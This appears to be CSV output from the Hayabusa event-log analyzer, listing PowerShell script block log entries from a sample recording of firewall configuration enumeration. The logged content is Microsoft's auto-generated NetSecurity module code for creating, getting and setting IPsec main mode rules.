@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociat",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"edNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 